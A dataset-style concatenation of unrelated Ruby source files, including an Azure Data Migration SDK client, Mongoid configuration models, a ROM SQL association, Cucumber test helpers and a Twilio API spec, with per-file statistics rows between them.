fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil?
fail ArgumentError, 'group_name is nil' if group_name.nil?
fail ArgumentError, 'service_name is nil' if service_name.nil?
fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
path_template = 'subscriptions/{subscriptionId}/resourceGroups/{groupName}/providers/Microsoft.DataMigration/services/{serviceName}/stop'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
path_params: {'subscriptionId' => @client.subscription_id,'groupName' => group_name,'serviceName' => service_name},
query_params: {'api-version' => @client.api_version},
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:post, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
# Anything outside 200/202 is surfaced as an HttpOperationError.
unless status_code == 200 || status_code == 202
error_model = JSON.load(response_content)
fail MsRest::HttpOperationError.new(result.request, http_response, error_model)
end
# Propagate Azure tracing headers onto the result for diagnostics.
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
result
end
promise.execute
end
#
# Get compatible SKUs
#
# The services resource is the top-level resource that represents the Data
# Migration Service. The skus action returns the list of SKUs that a service
# resource can be updated to.
#
# @param next_page_link [String] The NextLink from the previous successful call
# to List operation.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [ServiceSkuList] operation results.
#
def list_skus_next(next_page_link, custom_headers:nil)
  # Synchronous wrapper: fetch the next SKU page and unwrap the deserialized
  # ServiceSkuList body (nil when there is no response).
  result = list_skus_next_async(next_page_link, custom_headers:custom_headers).value!
  result.nil? ? nil : result.body
end
#
# Get compatible SKUs
#
# The services resource is the top-level resource that represents the Data
# Migration Service. The skus action returns the list of SKUs that a service
# resource can be updated to.
#
# @param next_page_link [String] The NextLink from the previous successful call
# to List operation.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def list_skus_next_with_http_info(next_page_link, custom_headers:nil)
  # Block on the async page fetch and return the full HTTP operation response.
  operation_response = list_skus_next_async(next_page_link, custom_headers:custom_headers).value!
  operation_response
end
#
# Get compatible SKUs
#
# The services resource is the top-level resource that represents the Data
# Migration Service. The skus action returns the list of SKUs that a service
# resource can be updated to.
#
# @param next_page_link [String] The NextLink from the previous successful call
# to List operation.
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
# Follows a paging nextLink verbatim (the link is a complete relative URL, so
# it is substituted without encoding) and deserializes the ServiceSkuList page.
# Only status 200 is accepted.
def list_skus_next_async(next_page_link, custom_headers:nil)
fail ArgumentError, 'next_page_link is nil' if next_page_link.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
path_template = '{nextLink}'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
skip_encoding_path_params: {'nextLink' => next_page_link},
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:get, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
# Any non-200 status is surfaced as an HttpOperationError.
unless status_code == 200
error_model = JSON.load(response_content)
fail MsRest::HttpOperationError.new(result.request, http_response, error_model)
end
# Propagate Azure tracing headers onto the result for diagnostics.
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
# Deserialize Response
if status_code == 200
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::DataMigration::Mgmt::V2018_03_15_preview::Models::ServiceSkuList.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
#
# Get services in resource group
#
# The Services resource is the top-level resource that represents the Data
# Migration Service. This method returns a list of service resources in a
# resource group.
#
# @param next_page_link [String] The NextLink from the previous successful call
# to List operation.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [DataMigrationServiceList] operation results.
#
def list_by_resource_group_next(next_page_link, custom_headers:nil)
  # Synchronous wrapper: fetch the next resource-group page and unwrap the
  # deserialized DataMigrationServiceList body (nil when there is no response).
  result = list_by_resource_group_next_async(next_page_link, custom_headers:custom_headers).value!
  result.nil? ? nil : result.body
end
#
# Get services in resource group
#
# The Services resource is the top-level resource that represents the Data
# Migration Service. This method returns a list of service resources in a
# resource group.
#
# @param next_page_link [String] The NextLink from the previous successful call
# to List operation.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def list_by_resource_group_next_with_http_info(next_page_link, custom_headers:nil)
  # Block on the async page fetch and return the full HTTP operation response.
  operation_response = list_by_resource_group_next_async(next_page_link, custom_headers:custom_headers).value!
  operation_response
end
#
# Get services in resource group
#
# The Services resource is the top-level resource that represents the Data
# Migration Service. This method returns a list of service resources in a
# resource group.
#
# @param next_page_link [String] The NextLink from the previous successful call
# to List operation.
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
# Follows a paging nextLink verbatim (the link is a complete relative URL, so
# it is substituted without encoding) and deserializes the next
# DataMigrationServiceList page. Only status 200 is accepted.
def list_by_resource_group_next_async(next_page_link, custom_headers:nil)
fail ArgumentError, 'next_page_link is nil' if next_page_link.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
path_template = '{nextLink}'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
skip_encoding_path_params: {'nextLink' => next_page_link},
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:get, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
# Any non-200 status is surfaced as an HttpOperationError.
unless status_code == 200
error_model = JSON.load(response_content)
fail MsRest::HttpOperationError.new(result.request, http_response, error_model)
end
# Propagate Azure tracing headers onto the result for diagnostics.
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
# Deserialize Response
if status_code == 200
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::DataMigration::Mgmt::V2018_03_15_preview::Models::DataMigrationServiceList.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
#
# Get services in subscription
#
# The services resource is the top-level resource that represents the Data
# Migration Service. This method returns a list of service resources in a
# subscription.
#
# @param next_page_link [String] The NextLink from the previous successful call
# to List operation.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [DataMigrationServiceList] operation results.
#
def list_next(next_page_link, custom_headers:nil)
  # Synchronous wrapper: fetch the next subscription page and unwrap the
  # deserialized DataMigrationServiceList body (nil when there is no response).
  result = list_next_async(next_page_link, custom_headers:custom_headers).value!
  result.nil? ? nil : result.body
end
#
# Get services in subscription
#
# The services resource is the top-level resource that represents the Data
# Migration Service. This method returns a list of service resources in a
# subscription.
#
# @param next_page_link [String] The NextLink from the previous successful call
# to List operation.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def list_next_with_http_info(next_page_link, custom_headers:nil)
  # Block on the async page fetch and return the full HTTP operation response.
  operation_response = list_next_async(next_page_link, custom_headers:custom_headers).value!
  operation_response
end
#
# Get services in subscription
#
# The services resource is the top-level resource that represents the Data
# Migration Service. This method returns a list of service resources in a
# subscription.
#
# @param next_page_link [String] The NextLink from the previous successful call
# to List operation.
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def list_next_async(next_page_link, custom_headers:nil)
fail ArgumentError, 'next_page_link is nil' if next_page_link.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
path_template = '{nextLink}'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
skip_encoding_path_params: {'nextLink' => next_page_link},
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:get, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 200
error_model = JSON.load(response_content)
fail MsRest::HttpOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
# Deserialize Response
if status_code == 200
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::DataMigration::Mgmt::V2018_03_15_preview::Models::DataMigrationServiceList.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
#
# Get compatible SKUs
#
# The services resource is the top-level resource that represents the Data
# Migration Service. The skus action returns the list of SKUs that a service
# resource can be updated to.
#
# @param group_name [String] Name of the resource group
# @param service_name [String] Name of the service
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [ServiceSkuList] which provide lazy access to pages of the response.
#
def list_skus_as_lazy(group_name, service_name, custom_headers:nil)
response = list_skus_async(group_name, service_name, custom_headers:custom_headers).value!
unless response.nil?
page = response.body
page.next_method = Proc.new do |next_page_link|
list_skus_next_async(next_page_link, custom_headers:custom_headers)
end
page
end
end
#
# Get services in resource group
#
# The Services resource is the top-level resource that represents the Data
# Migration Service. This method returns a list of service resources in a
# resource group.
#
# @param group_name [String] Name of the resource group
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [DataMigrationServiceList] which provide lazy access to pages of the
# response.
#
def list_by_resource_group_as_lazy(group_name, custom_headers:nil)
response = list_by_resource_group_async(group_name, custom_headers:custom_headers).value!
unless response.nil?
page = response.body
page.next_method = Proc.new do |next_page_link|
list_by_resource_group_next_async(next_page_link, custom_headers:custom_headers)
end
page
end
end
#
# Get services in subscription
#
# The services resource is the top-level resource that represents the Data
# Migration Service. This method returns a list of service resources in a
# subscription.
#
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [DataMigrationServiceList] which provide lazy access to pages of the
# response.
#
def list_as_lazy(custom_headers:nil)
response = list_async(custom_headers:custom_headers).value!
unless response.nil?
page = response.body
page.next_method = Proc.new do |next_page_link|
list_next_async(next_page_link, custom_headers:custom_headers)
end
page
end
end
end
end
| 43.954825 | 160 | 0.700388 |
2831d757a8fcdf1fd5b0a2a33a253c64a3de4890 | 354 | module Sinatra
module DevopsServiceWeb
module Core
module Routing
module Key
def self.registered(app)
add = lambda do
submit { |http| http.post(host + '/v2.0/key', params) }
end
app.post '/key', &add
end
end
end
end
end
end
| 16.090909 | 69 | 0.468927 |
79f5daf1784bb7cb46a3717e0e75a97eeed222f5 | 181 | require 'solidus_core'
require 'solidus_support'
require 'solidus_papertrail/version'
require 'solidus_papertrail/engine'
require 'solidus_papertrail/railtie'
require 'paper_trail'
| 25.857143 | 36 | 0.850829 |
287cdf60ffef3a87afb9c75a65d5e092fc448a73 | 104 | require_relative "./literal"
module Dentaku
  module AST
    # Marker AST node type distinguishing logical literals from other
    # literals. All behavior is inherited from Literal (see ./literal).
    class Logical < Literal
    end
  end
end
| 11.555556 | 28 | 0.701923 |
d5f9ad9786b9d5840f73d4764b46d1b44ef6d3d9 | 2,227 | # frozen_string_literal: true
require "rom/associations/many_to_many"
require "rom/sql/associations/core"
require "rom/sql/associations/self_ref"
module ROM
module SQL
module Associations
class ManyToMany < ROM::Associations::ManyToMany
include Associations::Core
include Associations::SelfRef
# @api public
def call(target: self.target)
left = join_assoc.(target: target)
schema =
if left.schema.key?(foreign_key)
if target != self.target
target.schema.merge(join_schema)
else
left.schema.uniq.project(*columns)
end
else
target_schema
end.qualified
relation = left.join(source_table, join_keys)
if view
apply_view(schema, relation)
else
schema.(relation)
end
end
# @api public
def join(type, source = self.source, target = self.target)
through_assoc = source.associations[through]
# first we join source to intermediary
joined = through_assoc.join(type, source)
# then we join intermediary to target
target_ds = target.name.dataset
through_jk = through_assoc.target.associations[target_ds].join_keys
joined.__send__(type, target_ds, through_jk).qualified
end
# @api public
def join_keys
{ source_attr => target_attr }
end
# @api public
def target_attr
join_relation[target_key].qualified
end
# @api private
def persist(children, parents)
join_tuples = associate(children, parents)
join_relation.multi_insert(join_tuples)
end
private
# @api private
def target_schema
target.schema.merge(join_schema)
end
# @api private
def join_schema
join_relation.schema.project(foreign_key)
end
# @api private
def columns
target_schema.map(&:name)
end
memoize :join_keys, :target_schema, :join_schema, :columns
end
end
end
end
| 25.022472 | 77 | 0.582847 |
33d24c001670334ec5f0d641f29db3090d1d88eb | 780 | require 'spec_helper'
# TODO: is there anything to test?
# describe DeviseAction::New do
# # pending "add some examples to (or delete) #{__FILE__}"
# end
# describe DeviseAction::Confirmed do
# # pending "add some examples to (or delete) #{__FILE__}"
# end
# describe DeviseAction::Login do
# # pending "add some examples to (or delete) #{__FILE__}"
# end
# describe DeviseAction::Password do
# # pending "add some examples to (or delete) #{__FILE__}"
# end
# describe DeviseAction::Unlocked do
# # pending "add some examples to (or delete) #{__FILE__}"
# end
# describe DeviseAction::Edit do
# # pending "add some examples to (or delete) #{__FILE__}"
# end
# describe DeviseAction::Delete do
# # pending "add some examples to (or delete) #{__FILE__}"
# end
| 24.375 | 60 | 0.69359 |
4a5206bd0a4a32a3137c8b4ee997e78b9807aab2 | 3,893 | module Obscured
module AptWatcher
module Models
class Configuration
include Mongoid::Document
include Mongoid::Timestamps
store_in collection: 'configuration'
field :instance, type: String, :default => ''
field :setup_completed, type: Boolean, :default => false
field :user_registration, type: Boolean, :default => false
field :user_confirmation, type: Boolean, :default => false
index({ instance: 1 }, { background: true })
embeds_one :api, :class_name => 'Obscured::AptWatcher::Models::APIConfiguration', autobuild: true
embeds_one :slack, :class_name => 'Obscured::AptWatcher::Models::SlackConfiguration', autobuild: true
embeds_one :smtp, :class_name => 'Obscured::AptWatcher::Models::SMTPConfiguration', autobuild: true
embeds_one :raygun, :class_name => 'Obscured::AptWatcher::Models::RaygunConfiguration', autobuild: true
embeds_one :bitbucket, :class_name => 'Obscured::AptWatcher::Models::BitbucketConfiguration', autobuild: true
embeds_one :github, :class_name => 'Obscured::AptWatcher::Models::GitHubConfiguration', autobuild: true
validates_presence_of :api
validates_presence_of :slack
validates_presence_of :smtp
validates_presence_of :raygun
validates_presence_of :bitbucket
validates_presence_of :github
before_update do |document|
document.setup_completed = true
end
def self.make(opts)
if Configuration.where(:instance => opts[:instance]).exists?
raise Obscured::DomainError.new(:already_exists, what: 'Configuration does already exists!')
end
config = self.new
config
end
end
class APIConfiguration
include Mongoid::Document
field :username, type: String, :default => ''
field :password, type: String, :default => ''
embedded_in :configuration, autobuild: true
end
class SlackConfiguration
include Mongoid::Document
field :enabled, type: Boolean, :default => false
field :channel, type: String, :default => ''
field :icon, type: String, :default => ':slack:'
field :user, type: String, :default => 'AptWatcher'
field :webhook, type: String
embedded_in :configuration, autobuild: true
end
class SMTPConfiguration
include Mongoid::Document
field :enabled, type: Boolean, :default => false
field :domain, type: String, :default => ''
field :host, type: String, :default => 'smtp.sendgrid.net'
field :port, type: Integer, :default => 587
field :username, type: String
field :password, type: String
embedded_in :configuration, autobuild: true
end
class RaygunConfiguration
include Mongoid::Document
field :enabled, type: Boolean, :default => false
field :key, type: String
embedded_in :configuration, autobuild: true
end
class BitbucketConfiguration
include Mongoid::Document
field :enabled, type: Boolean, :default => false
field :key, type: String, :default => ''
field :secret, type: String, :default => ''
field :domains, type: String, :default => ''
embedded_in :configuration, autobuild: true
end
class GitHubConfiguration
include Mongoid::Document
field :enabled, type: Boolean, :default => false
field :key, type: String, :default => ''
field :secret, type: String, :default => ''
field :domains, type: String, :default => ''
embedded_in :configuration, autobuild: true
end
end
end
end | 34.451327 | 117 | 0.614436 |
87b22730eaf076281c09fa8a27d1944e3e8e1295 | 3,396 | require 'rubygems'
require 'tempfile'
require 'spec/expectations'
require 'fileutils'
require 'forwardable'
require 'cucumber/formatter/unicode'
# World object for Cucumber's own self-tests: locates the examples/self_test
# tree, writes fixture files, shells out to cucumber/spork, and captures
# stdout/stderr/exit status for the step definitions to assert on.
class CucumberWorld
  extend Forwardable
  # Expose the class-level path helpers as instance methods too.
  def_delegators CucumberWorld, :examples_dir, :self_test_dir, :working_dir, :cucumber_lib_dir
  # Absolute path to the examples directory (optionally a subdirectory of it).
  def self.examples_dir(subdir=nil)
    @examples_dir ||= File.expand_path(File.join(File.dirname(__FILE__), '../../examples'))
    subdir ? File.join(@examples_dir, subdir) : @examples_dir
  end
  def self.self_test_dir
    @self_test_dir ||= examples_dir('self_test')
  end
  # Scratch directory recreated before every scenario (see the Before hook).
  def self.working_dir
    @working_dir ||= examples_dir('self_test/tmp')
  end
  def cucumber_lib_dir
    @cucumber_lib_dir ||= File.expand_path(File.join(File.dirname(__FILE__), '../../lib'))
  end
  def initialize
    @current_dir = self_test_dir
  end
  private
  attr_reader :last_exit_status, :last_stderr
  # The last standard out, with the duration line taken out (unpredictable)
  def last_stdout
    strip_1_9_paths(strip_duration(@last_stdout))
  end
  # Remove the "NmN.NNNs" duration line cucumber prints.
  def strip_duration(s)
    s.gsub(/^\d+m\d+\.\d+s\n/m, "")
  end
  # Normalize absolute self_test paths (as printed by Ruby 1.9) to ".".
  def strip_1_9_paths(s)
    s.gsub(/#{Dir.pwd}\/examples\/self_test\/tmp/m, ".").gsub(/#{Dir.pwd}\/examples\/self_test/m, ".")
  end
  def replace_duration(s, replacement)
    s.gsub(/\d+m\d+\.\d+s/m, replacement)
  end
  def replace_junit_duration(s, replacement)
    s.gsub(/\d+\.\d\d+/m, replacement)
  end
  def strip_ruby186_extra_trace(s)
    s.gsub(/^.*\.\/features\/step_definitions(.*)\n/, "")
  end
  # Write a fixture file under the current dir, substituting CUCUMBER_LIB
  # with the quoted lib path. NOTE(review): mutates file_content via gsub!.
  def create_file(file_name, file_content)
    file_content.gsub!("CUCUMBER_LIB", "'#{cucumber_lib_dir}'") # Some files, such as Rakefiles need to use the lib dir
    in_current_dir do
      FileUtils.mkdir_p(File.dirname(file_name)) unless File.directory?(File.dirname(file_name))
      File.open(file_name, 'w') { |f| f << file_content }
    end
  end
  # Set an ENV entry, remembering the original value so the After hook can
  # restore it via #restore_original_env_vars.
  def set_env_var(variable, value)
    @original_env_vars ||= {}
    @original_env_vars[variable] = ENV[variable]
    ENV[variable] = value
  end
  def background_jobs
    @background_jobs ||= []
  end
  def in_current_dir(&block)
    Dir.chdir(@current_dir, &block)
  end
  # Run a shell command in the current dir, capturing stdout, stderr (via a
  # temp file) and the exit status. NOTE(review): the Tempfile is never
  # unlinked explicitly; it is cleaned up only at interpreter exit.
  def run(command)
    stderr_file = Tempfile.new('cucumber')
    stderr_file.close
    in_current_dir do
      mode = Cucumber::RUBY_1_9 ? {:external_encoding=>"UTF-8"} : 'r'
      IO.popen("#{command} 2> #{stderr_file.path}", mode) do |io|
        @last_stdout = io.read
      end
      @last_exit_status = $?.exitstatus
    end
    @last_stderr = IO.read(stderr_file.path)
  end
  # Fork a spork server; the parent records the pid for later cleanup, the
  # child execs spork (optionally on a given port). Sleeps to give the
  # server time to boot.
  def run_spork_in_background(port = nil)
    require 'spork'
    pid = fork
    in_current_dir do
      if pid
        background_jobs << pid
      else
        # STDOUT.close
        # STDERR.close
        port_arg = port ? "-p #{port}" : ''
        cmd = "#{Cucumber::RUBY_BINARY} -I #{Cucumber::LIBDIR} #{Spork::BINARY} cuc #{port_arg}"
        exec cmd
      end
    end
    sleep 1.0
  end
  # SIGTERM every process started by #run_spork_in_background.
  def terminate_background_jobs
    background_jobs.each do |pid|
      Process.kill(Signal.list['TERM'], pid)
    end
  end
  def restore_original_env_vars
    @original_env_vars.each { |variable, value| ENV[variable] = value } if @original_env_vars
  end
end
# Every scenario gets a fresh CucumberWorld as its World object.
World do
  CucumberWorld.new
end
# Give each scenario a clean tmp working directory.
Before do
  FileUtils.rm_rf CucumberWorld.working_dir
  FileUtils.mkdir CucumberWorld.working_dir
end
# Kill spawned spork processes and undo any ENV mutations.
After do
  terminate_background_jobs
  restore_original_env_vars
end
| 24.257143 | 119 | 0.679918 |
bf961204f7bdcd8287aec8a690d1c24eb4eb9b41 | 41 | class Continent < ActiveRecord::Base
end | 13.666667 | 36 | 0.804878 |
f857468d5e444311f619afa5c4411a16d61463f8 | 60 | module Gollum
module Auth
VERSION = '0.0.1'
end
end
| 10 | 21 | 0.633333 |
e2543803c06b432461a4a01c36525d47d1d86d83 | 1,241 | require 'test_helper'
class AlbumTest < ActiveSupport::TestCase
  fixtures :albums

  # Sanity check that the test environment and fixtures load.
  test "the truth" do
    assert true
  end

  # Exercises Album#set_places with the fixture's title/description.
  # NOTE(review): has no assertion — it only verifies the call does not raise.
  test "Finds and links parent place" do
    album = albums(:columbia)
    album.set_places(album.title, album.description)
  end

  # Verifies Album#set_links associates every place mentioned in :columbia.
  #
  # Fixed: the original assertions compared find_by_name results against []
  # (`assert x != []`), which is always true because find_by_name returns a
  # record or nil (and nil != [] holds) — so they could never fail. They now
  # use assert_not_nil, matching the nil-check style of the first assertion.
  test "Find and link all mentioned places" do
    album = albums(:columbia)
    album.set_links
    assert_equal 11, album.places_mentioned.length
    [
      "Wales Peak",
      "Chaba Peak",
      "Mount Clemeneau", # NOTE(review): possible typo for "Clemenceau"; must match fixture data
      "False Chaba Peak",
      "Listening Mountain",
      "Sundial Mountain",
      "Sundial E4",
      "Mount Hooker",
      "Serenity Mountain",
      "Warwick Mountain",
      "Dais Mountain"
    ].each do |place_name|
      assert_not_nil album.places_mentioned.find_by_name(place_name),
                     "Expected #{place_name} to be among the mentioned places"
    end
  end
end
| 36.5 | 74 | 0.727639 |
0390299efc54b829ceea993249e216780f92f697 | 294 | # frozen_string_literal: true
module LastbillClient
module Error
# @author [email protected]
# 404 error sent by Lastbill server
class NotFound < Generic
def initialize(msg = "404 Not Found")
super(status: :not_found, message: msg)
end
end
end
end
| 21 | 47 | 0.676871 |
bbcc5c6ecb09b4646f9f5f2d2d76f170cbe582bd | 8,628 | ##
# This code was generated by
# \ / _ _ _| _ _
# | (_)\/(_)(_|\/| |(/_ v1.0.0
# / /
#
# frozen_string_literal: true
require 'spec_helper.rb'
# Auto-generated Twilio REST spec for the Preview DeployedDevices Certificate
# resource. Each "can X" example checks the request shape sent to the mocked
# transport (@holodeck); each "receives X responses" example checks that a
# canned response body deserializes without error.
describe 'Certificate' do
  # fetch must issue GET .../Certificates/{sid} and surface HTTP 500 as TwilioError.
  it "can fetch" do
    @holodeck.mock(Twilio::Response.new(500, ''))

    expect {
      @client.preview.deployed_devices.fleets('FLXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX') \
                                      .certificates('CYXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX').fetch()
    }.to raise_exception(Twilio::REST::TwilioError)

    expect(
    @holodeck.has_request?(Holodeck::Request.new(
        method: 'get',
        url: 'https://preview.twilio.com/DeployedDevices/Fleets/FLXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX/Certificates/CYXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX',
    ))).to eq(true)
  end

  it "receives fetch responses" do
    @holodeck.mock(Twilio::Response.new(
        200,
      %q[
      {
          "sid": "CYaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
          "friendly_name": "friendly_name",
          "account_sid": "ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
          "fleet_sid": "FLaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
          "device_sid": "THaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
          "thumbprint": "1234567890",
          "date_created": "2016-07-30T20:00:00Z",
          "date_updated": null,
          "url": "https://preview.twilio.com/DeployedDevices/Fleets/FLaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Certificates/CYaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
      }
      ]
    ))

    actual = @client.preview.deployed_devices.fleets('FLXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX') \
                                             .certificates('CYXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX').fetch()

    expect(actual).to_not eq(nil)
  end

  # delete must issue DELETE .../Certificates/{sid}.
  it "can delete" do
    @holodeck.mock(Twilio::Response.new(500, ''))

    expect {
      @client.preview.deployed_devices.fleets('FLXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX') \
                                      .certificates('CYXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX').delete()
    }.to raise_exception(Twilio::REST::TwilioError)

    expect(
    @holodeck.has_request?(Holodeck::Request.new(
        method: 'delete',
        url: 'https://preview.twilio.com/DeployedDevices/Fleets/FLXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX/Certificates/CYXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX',
    ))).to eq(true)
  end

  # A 204 with no body deserializes to a bare true.
  it "receives delete responses" do
    @holodeck.mock(Twilio::Response.new(
        204,
        nil,
    ))

    actual = @client.preview.deployed_devices.fleets('FLXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX') \
                                             .certificates('CYXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX').delete()

    expect(actual).to eq(true)
  end

  # create must POST the CertificateData form field to .../Certificates.
  it "can create" do
    @holodeck.mock(Twilio::Response.new(500, ''))

    expect {
      @client.preview.deployed_devices.fleets('FLXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX') \
                                      .certificates.create(certificate_data: 'certificate_data')
    }.to raise_exception(Twilio::REST::TwilioError)

    values = {'CertificateData' => 'certificate_data', }
    expect(
    @holodeck.has_request?(Holodeck::Request.new(
        method: 'post',
        url: 'https://preview.twilio.com/DeployedDevices/Fleets/FLXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX/Certificates',
        data: values,
    ))).to eq(true)
  end

  it "receives create responses" do
    @holodeck.mock(Twilio::Response.new(
        201,
      %q[
      {
          "sid": "CYaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
          "friendly_name": "friendly_name",
          "account_sid": "ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
          "fleet_sid": "FLaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
          "device_sid": "THaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
          "thumbprint": "1234567890",
          "date_created": "2016-07-30T20:00:00Z",
          "date_updated": null,
          "url": "https://preview.twilio.com/DeployedDevices/Fleets/FLaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Certificates/CYaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
      }
      ]
    ))

    actual = @client.preview.deployed_devices.fleets('FLXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX') \
                                             .certificates.create(certificate_data: 'certificate_data')

    expect(actual).to_not eq(nil)
  end

  # list must issue GET .../Certificates.
  it "can read" do
    @holodeck.mock(Twilio::Response.new(500, ''))

    expect {
      @client.preview.deployed_devices.fleets('FLXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX') \
                                      .certificates.list()
    }.to raise_exception(Twilio::REST::TwilioError)

    expect(
    @holodeck.has_request?(Holodeck::Request.new(
        method: 'get',
        url: 'https://preview.twilio.com/DeployedDevices/Fleets/FLXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX/Certificates',
    ))).to eq(true)
  end

  it "receives read_empty responses" do
    @holodeck.mock(Twilio::Response.new(
        200,
      %q[
      {
          "certificates": [],
          "meta": {
